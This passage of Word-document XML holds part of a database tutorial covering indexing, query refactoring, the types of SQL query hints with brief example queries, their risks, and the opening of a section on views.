        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Create an Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440C5F22" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D"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CREATE INDEX idx_customer_id ON orders(customer_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AA683B" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="428"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Refactor Query</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFE294" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D"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order_id, order_date, total_amount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD42CC4" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D"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orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC655B5" w14:textId="77777777" w:rsidR="00A8106D" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D"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customer_id = 12345;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02667BFA" w14:textId="03988F28" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A8106D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: By creating an index on customer_id and selecting only the necessary columns, the query execution is optimized, reducing response time and resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD14CBD" w14:textId="64E46C9A" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc178383317"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are query hints</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="723245A3" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query hints</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> are directives provided to the database management system (DBMS) that influence how it processes a query. They are used to guide the query optimizer in choosing specific execution strategies or plans. Query hints can be helpful when the optimizer's automatic choices are not optimal for a particular query, often due to complex data distributions, schema designs, or workload patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA675B1" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Query Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FDBFB9" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Index Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0ED6E"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Specify which index should be used for a query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48916AE7"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230B4310"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 FROM orders USE INDEX (idx_customer_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02187FE1"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customer_id = 12345;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE7DA9"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Instructs the database to use the specified index (idx_customer_id) for retrieving the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857623C" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Join Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B607E38"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Control the order or method of joining tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD6FCB1"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1D92B43E"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SELECT * FROM orders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2019812C"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INNER JOIN customers ON orders.customer_id = customers.customer_id </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D35E0"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ORDERED;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17889164"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Forces the database to join tables in the specified order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E79F3" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Table Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D94A34"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Direct the DBMS on how to access a table, such as specifying a locking strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B006828"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34F8E244"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 FROM orders WITH (NOLOCK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0D1F99"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order_date &gt; '2024-01-01';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518202B4"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Applies the NOLOCK hint to avoid locking the table while reading data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AE903B" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Optimization Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFDCEE"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Influence query optimization strategies, such as controlling parallelism or specifying a specific query plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592B8AD3"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3EC07CF5"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SELECT * FROM orders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7986A90E"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OPTION (RECOMPILE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E106710"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Forces the query to be recompiled each time it is run, which can be useful if query plans are frequently changing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164E96B9" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Aggregation Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8FCBD"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Affect how aggregate functions are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04CE13"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3C8D03C"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SELECT customer_id, SUM(total_amount) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E98D3F"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FROM orders </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDCA90B" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25"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OPTION (OPTIMIZE FOR UNKNOWN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4DC7EA" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="430"/>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Suggests that the optimizer should not make assumptions based on parameter values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB2956" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>When to Use Query Hints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D8D1B" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance Tuning</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Use hints when you have identified that the query optimizer is not choosing the most efficient execution plan and you want to guide it towards a better plan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CAF582" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Complex Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: For complex queries involving multiple joins, subqueries, or large datasets, hints can help optimize performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D397EFB" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Specific Use Cases</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: When dealing with particular use cases like read-only operations or specific locking requirements, hints can fine-tune query execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C91550" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A436565" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Potential Risks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Over-relying on hints can lead to maintenance issues, as query hints may not adapt well to changes in data distribution or schema updates. It can also bypass improvements made by the database engine's query optimizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695AA88" w14:textId="77777777" w:rsidR="00414C25" w:rsidRPr="00DA2F32" w:rsidRDefault="00414C25" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="432"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Always test the impact of query hints in a staging environment before applying them in production to ensure they have the desired effect on performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C74EA71" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A845C6B" w14:textId="73D04CA2" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc178383318"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What is view and when to use it</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="4ECB6964" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>view</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a database is a virtual table that is based on the result of a query. It does not store the data itself but provides a way to represent and interact with data from one or more tables in a simplified or customized manner. Views are defined by SQL queries and can be used to present data in a way that is meaningful for specific use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C97013C" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Characteristics of Views</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78175ED1" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Virtual Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A view does not physically store data. It is defined by a SELECT statement that dynamically retrieves data from underlying tables when the view is queried.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D7A3A" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Custom Representation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Views can aggregate, filter, or format data to present it in a specific way. They provide a simplified or customized view of data without changing the underlying schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66D81D" w14:textId="77777777" w:rsidR="00633211" w:rsidRPr="00DA2F32" w:rsidRDefault="00633211" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="433"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
